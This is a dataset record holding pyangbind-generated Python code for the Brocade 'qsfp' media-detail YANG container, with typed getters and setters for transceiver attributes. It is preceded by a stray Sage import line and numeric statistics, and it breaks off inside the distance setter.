lazy_import('sage.rings.polynomial.weil.weil_polynomials', 'WeilPolynomials')
| 41.333333
| 77
| 0.846774
| 17
| 124
| 5.941176
| 0.588235
| 0.29703
| 0.316832
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.048387
| 124
| 2
| 78
| 62
| 0.855932
| 0
| 0
| 0
| 0
| 0
| 0.467742
| 0.346774
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6b1380b1c2714a15bfde44abdbfc677e5edf6fe1
| 60,602
|
py
|
Python
|
pybind/slxos/v17s_1_02/brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/__init__.py
|
extremenetworks/pybind
|
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
|
[
"Apache-2.0"
] | null | null | null |
pybind/slxos/v17s_1_02/brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/__init__.py
|
extremenetworks/pybind
|
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
|
[
"Apache-2.0"
] | null | null | null |
pybind/slxos/v17s_1_02/brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/__init__.py
|
extremenetworks/pybind
|
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
|
[
"Apache-2.0"
] | 1
|
2021-11-05T22:15:42.000Z
|
2021-11-05T22:15:42.000Z
|
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
class qsfp(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-interface-ext - based on the path /brocade_interface_ext_rpc/get-media-detail/output/interface/qsfp. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__speed','__connector','__encoding','__vendor_name','__vendor_oui','__vendor_pn','__vendor_rev','__distance','__media_form_factor','__wavelength','__serial_no','__date_code','__temperature','__voltage','__current','__tx_power','__rx_power',)
_yang_name = 'qsfp'
_rest_name = 'qsfp'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__distance = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'short-dist': {'value': 1}, u'unknown': {'value': 4}, u'long-dist': {'value': 3}, u'inter-dist': {'value': 2}},), is_leaf=True, yang_name="distance", rest_name="distance", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='enumeration', is_config=True)
self.__vendor_rev = YANGDynClass(base=unicode, is_leaf=True, yang_name="vendor-rev", rest_name="vendor-rev", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
self.__encoding = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'sonet-scrambled': {'value': 9}, u'4b5b': {'value': 6}, u'rz': {'value': 1}, u'8b10b': {'value': 4}, u'nrz': {'value': 2}, u'sonet': {'value': 3}, u'manchester': {'value': 7}, u'unknown': {'value': 10}, u'64b66b': {'value': 5}, u'ieee-802-3ab': {'value': 8}},), is_leaf=True, yang_name="encoding", rest_name="encoding", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='enumeration', is_config=True)
self.__vendor_oui = YANGDynClass(base=unicode, is_leaf=True, yang_name="vendor-oui", rest_name="vendor-oui", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
self.__serial_no = YANGDynClass(base=unicode, is_leaf=True, yang_name="serial-no", rest_name="serial-no", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
self.__media_form_factor = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'tv': {'value': 5}, u'tw': {'value': 8}, u'mi': {'value': 6}, u'tp': {'value': 7}, u'm5': {'value': 3}, u'm6': {'value': 4}, u'sm': {'value': 1}, u'unknown': {'value': 9}, u'mx': {'value': 2}},), is_leaf=True, yang_name="media-form-factor", rest_name="media-form-factor", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='enumeration', is_config=True)
self.__connector = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'no-separable-connector': {'value': 36}, u'mpo-parallel-optic': {'value': 12}, u'style-2-copper': {'value': 3}, u'mpo': {'value': 13}, u'fiber-jack': {'value': 6}, u'unknown': {'value': 35}, u'bnc-tnc': {'value': 4}, u'style-1-copper': {'value': 2}, u'mu': {'value': 9}, u'cat-5-copper-cable': {'value': 34}, u'copper-pigtail': {'value': 33}, u'optical-pigtail': {'value': 11}, u'coaxial': {'value': 5}, u'hssdc-ii': {'value': 32}, u'sc': {'value': 1}, u'sg': {'value': 10}, u'mt-rj': {'value': 8}, u'lc': {'value': 7}},), is_leaf=True, yang_name="connector", rest_name="connector", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='enumeration', is_config=True)
self.__date_code = YANGDynClass(base=unicode, is_leaf=True, yang_name="date-code", rest_name="date-code", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
self.__tx_power = YANGDynClass(base=RestrictedPrecisionDecimalType(precision=1), is_leaf=True, yang_name="tx-power", rest_name="tx-power", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='decimal64', is_config=True)
self.__voltage = YANGDynClass(base=RestrictedPrecisionDecimalType(precision=1), is_leaf=True, yang_name="voltage", rest_name="voltage", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='decimal64', is_config=True)
self.__vendor_pn = YANGDynClass(base=unicode, is_leaf=True, yang_name="vendor-pn", rest_name="vendor-pn", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
self.__rx_power = YANGDynClass(base=RestrictedPrecisionDecimalType(precision=1), is_leaf=True, yang_name="rx-power", rest_name="rx-power", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='decimal64', is_config=True)
self.__wavelength = YANGDynClass(base=unicode, is_leaf=True, yang_name="wavelength", rest_name="wavelength", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
self.__current = YANGDynClass(base=RestrictedPrecisionDecimalType(precision=3), is_leaf=True, yang_name="current", rest_name="current", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='decimal64', is_config=True)
self.__vendor_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="vendor-name", rest_name="vendor-name", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
self.__speed = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'8Gbps': {'value': 9}, u'nil': {'value': 1}, u'40Gbps': {'value': 5}, u'1Gbps': {'value': 3}, u'auto': {'value': 2}, u'25Gbps': {'value': 12}, u'10Gbps': {'value': 4}, u'4Gbps': {'value': 8}, u'100Gbps': {'value': 11}, u'100Mbps': {'value': 6}, u'16Gbps': {'value': 10}, u'2Gbps': {'value': 7}},), is_leaf=True, yang_name="speed", rest_name="speed", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='line-speed', is_config=True)
self.__temperature = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="temperature", rest_name="temperature", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='uint32', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'brocade_interface_ext_rpc', u'get-media-detail', u'output', u'interface', u'qsfp']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'get-media-detail', u'output', u'interface', u'qsfp']
def _get_speed(self):
"""
Getter method for speed, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/speed (line-speed)
YANG Description: The actual line speed of this interface.
"""
return self.__speed
def _set_speed(self, v, load=False):
"""
Setter method for speed, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/speed (line-speed)
If this variable is read-only (config: false) in the
source YANG file, then _set_speed is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_speed() directly.
YANG Description: The actual line speed of this interface.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'8Gbps': {'value': 9}, u'nil': {'value': 1}, u'40Gbps': {'value': 5}, u'1Gbps': {'value': 3}, u'auto': {'value': 2}, u'25Gbps': {'value': 12}, u'10Gbps': {'value': 4}, u'4Gbps': {'value': 8}, u'100Gbps': {'value': 11}, u'100Mbps': {'value': 6}, u'16Gbps': {'value': 10}, u'2Gbps': {'value': 7}},), is_leaf=True, yang_name="speed", rest_name="speed", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='line-speed', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """speed must be of a type compatible with line-speed""",
'defined-type': "brocade-interface-ext:line-speed",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'8Gbps': {'value': 9}, u'nil': {'value': 1}, u'40Gbps': {'value': 5}, u'1Gbps': {'value': 3}, u'auto': {'value': 2}, u'25Gbps': {'value': 12}, u'10Gbps': {'value': 4}, u'4Gbps': {'value': 8}, u'100Gbps': {'value': 11}, u'100Mbps': {'value': 6}, u'16Gbps': {'value': 10}, u'2Gbps': {'value': 7}},), is_leaf=True, yang_name="speed", rest_name="speed", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='line-speed', is_config=True)""",
})
self.__speed = t
if hasattr(self, '_set'):
self._set()
def _unset_speed(self):
self.__speed = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'8Gbps': {'value': 9}, u'nil': {'value': 1}, u'40Gbps': {'value': 5}, u'1Gbps': {'value': 3}, u'auto': {'value': 2}, u'25Gbps': {'value': 12}, u'10Gbps': {'value': 4}, u'4Gbps': {'value': 8}, u'100Gbps': {'value': 11}, u'100Mbps': {'value': 6}, u'16Gbps': {'value': 10}, u'2Gbps': {'value': 7}},), is_leaf=True, yang_name="speed", rest_name="speed", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='line-speed', is_config=True)
def _get_connector(self):
"""
Getter method for connector, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/connector (enumeration)
YANG Description: This specifies the type of connector
connected to the interface.
"""
return self.__connector
def _set_connector(self, v, load=False):
"""
Setter method for connector, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/connector (enumeration)
If this variable is read-only (config: false) in the
source YANG file, then _set_connector is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_connector() directly.
YANG Description: This specifies the type of connector
connected to the interface.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'no-separable-connector': {'value': 36}, u'mpo-parallel-optic': {'value': 12}, u'style-2-copper': {'value': 3}, u'mpo': {'value': 13}, u'fiber-jack': {'value': 6}, u'unknown': {'value': 35}, u'bnc-tnc': {'value': 4}, u'style-1-copper': {'value': 2}, u'mu': {'value': 9}, u'cat-5-copper-cable': {'value': 34}, u'copper-pigtail': {'value': 33}, u'optical-pigtail': {'value': 11}, u'coaxial': {'value': 5}, u'hssdc-ii': {'value': 32}, u'sc': {'value': 1}, u'sg': {'value': 10}, u'mt-rj': {'value': 8}, u'lc': {'value': 7}},), is_leaf=True, yang_name="connector", rest_name="connector", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='enumeration', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """connector must be of a type compatible with enumeration""",
'defined-type': "brocade-interface-ext:enumeration",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'no-separable-connector': {'value': 36}, u'mpo-parallel-optic': {'value': 12}, u'style-2-copper': {'value': 3}, u'mpo': {'value': 13}, u'fiber-jack': {'value': 6}, u'unknown': {'value': 35}, u'bnc-tnc': {'value': 4}, u'style-1-copper': {'value': 2}, u'mu': {'value': 9}, u'cat-5-copper-cable': {'value': 34}, u'copper-pigtail': {'value': 33}, u'optical-pigtail': {'value': 11}, u'coaxial': {'value': 5}, u'hssdc-ii': {'value': 32}, u'sc': {'value': 1}, u'sg': {'value': 10}, u'mt-rj': {'value': 8}, u'lc': {'value': 7}},), is_leaf=True, yang_name="connector", rest_name="connector", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='enumeration', is_config=True)""",
})
self.__connector = t
if hasattr(self, '_set'):
self._set()
def _unset_connector(self):
self.__connector = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'no-separable-connector': {'value': 36}, u'mpo-parallel-optic': {'value': 12}, u'style-2-copper': {'value': 3}, u'mpo': {'value': 13}, u'fiber-jack': {'value': 6}, u'unknown': {'value': 35}, u'bnc-tnc': {'value': 4}, u'style-1-copper': {'value': 2}, u'mu': {'value': 9}, u'cat-5-copper-cable': {'value': 34}, u'copper-pigtail': {'value': 33}, u'optical-pigtail': {'value': 11}, u'coaxial': {'value': 5}, u'hssdc-ii': {'value': 32}, u'sc': {'value': 1}, u'sg': {'value': 10}, u'mt-rj': {'value': 8}, u'lc': {'value': 7}},), is_leaf=True, yang_name="connector", rest_name="connector", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='enumeration', is_config=True)
def _get_encoding(self):
"""
Getter method for encoding, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/encoding (enumeration)
YANG Description: This indicates the type of encoding used to
transmit the data on this interface.
"""
return self.__encoding
def _set_encoding(self, v, load=False):
"""
Setter method for encoding, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/encoding (enumeration)
If this variable is read-only (config: false) in the
source YANG file, then _set_encoding is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_encoding() directly.
YANG Description: This indicates the type of encoding used to
transmit the data on this interface.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'sonet-scrambled': {'value': 9}, u'4b5b': {'value': 6}, u'rz': {'value': 1}, u'8b10b': {'value': 4}, u'nrz': {'value': 2}, u'sonet': {'value': 3}, u'manchester': {'value': 7}, u'unknown': {'value': 10}, u'64b66b': {'value': 5}, u'ieee-802-3ab': {'value': 8}},), is_leaf=True, yang_name="encoding", rest_name="encoding", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='enumeration', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """encoding must be of a type compatible with enumeration""",
'defined-type': "brocade-interface-ext:enumeration",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'sonet-scrambled': {'value': 9}, u'4b5b': {'value': 6}, u'rz': {'value': 1}, u'8b10b': {'value': 4}, u'nrz': {'value': 2}, u'sonet': {'value': 3}, u'manchester': {'value': 7}, u'unknown': {'value': 10}, u'64b66b': {'value': 5}, u'ieee-802-3ab': {'value': 8}},), is_leaf=True, yang_name="encoding", rest_name="encoding", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='enumeration', is_config=True)""",
})
self.__encoding = t
if hasattr(self, '_set'):
self._set()
def _unset_encoding(self):
self.__encoding = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'sonet-scrambled': {'value': 9}, u'4b5b': {'value': 6}, u'rz': {'value': 1}, u'8b10b': {'value': 4}, u'nrz': {'value': 2}, u'sonet': {'value': 3}, u'manchester': {'value': 7}, u'unknown': {'value': 10}, u'64b66b': {'value': 5}, u'ieee-802-3ab': {'value': 8}},), is_leaf=True, yang_name="encoding", rest_name="encoding", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='enumeration', is_config=True)
def _get_vendor_name(self):
"""
Getter method for vendor_name, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/vendor_name (string)
YANG Description: This indicates the Vendor of this interface.
"""
return self.__vendor_name
def _set_vendor_name(self, v, load=False):
"""
Setter method for vendor_name, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/vendor_name (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_vendor_name is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_vendor_name() directly.
YANG Description: This indicates the Vendor of this interface.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="vendor-name", rest_name="vendor-name", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """vendor_name must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="vendor-name", rest_name="vendor-name", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)""",
})
self.__vendor_name = t
if hasattr(self, '_set'):
self._set()
def _unset_vendor_name(self):
self.__vendor_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="vendor-name", rest_name="vendor-name", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
def _get_vendor_oui(self):
"""
Getter method for vendor_oui, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/vendor_oui (string)
YANG Description: This indicates the Vendor IEEE company ID.
"""
return self.__vendor_oui
def _set_vendor_oui(self, v, load=False):
"""
Setter method for vendor_oui, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/vendor_oui (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_vendor_oui is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_vendor_oui() directly.
YANG Description: This indicates the Vendor IEEE company ID.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="vendor-oui", rest_name="vendor-oui", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """vendor_oui must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="vendor-oui", rest_name="vendor-oui", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)""",
})
self.__vendor_oui = t
if hasattr(self, '_set'):
self._set()
def _unset_vendor_oui(self):
self.__vendor_oui = YANGDynClass(base=unicode, is_leaf=True, yang_name="vendor-oui", rest_name="vendor-oui", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
def _get_vendor_pn(self):
"""
Getter method for vendor_pn, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/vendor_pn (string)
YANG Description: This indicates the Part number.
"""
return self.__vendor_pn
def _set_vendor_pn(self, v, load=False):
"""
Setter method for vendor_pn, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/vendor_pn (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_vendor_pn is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_vendor_pn() directly.
YANG Description: This indicates the Part number.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="vendor-pn", rest_name="vendor-pn", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """vendor_pn must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="vendor-pn", rest_name="vendor-pn", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)""",
})
self.__vendor_pn = t
if hasattr(self, '_set'):
self._set()
def _unset_vendor_pn(self):
self.__vendor_pn = YANGDynClass(base=unicode, is_leaf=True, yang_name="vendor-pn", rest_name="vendor-pn", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
def _get_vendor_rev(self):
"""
Getter method for vendor_rev, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/vendor_rev (string)
YANG Description: This indicates the Revision level.
"""
return self.__vendor_rev
def _set_vendor_rev(self, v, load=False):
"""
Setter method for vendor_rev, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/vendor_rev (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_vendor_rev is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_vendor_rev() directly.
YANG Description: This indicates the Revision level.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="vendor-rev", rest_name="vendor-rev", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """vendor_rev must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="vendor-rev", rest_name="vendor-rev", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)""",
})
self.__vendor_rev = t
if hasattr(self, '_set'):
self._set()
def _unset_vendor_rev(self):
self.__vendor_rev = YANGDynClass(base=unicode, is_leaf=True, yang_name="vendor-rev", rest_name="vendor-rev", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='string', is_config=True)
def _get_distance(self):
"""
Getter method for distance, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/distance (enumeration)
"""
return self.__distance
def _set_distance(self, v, load=False):
"""
Setter method for distance, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/distance (enumeration)
If this variable is read-only (config: false) in the
source YANG file, then _set_distance is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_distance() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
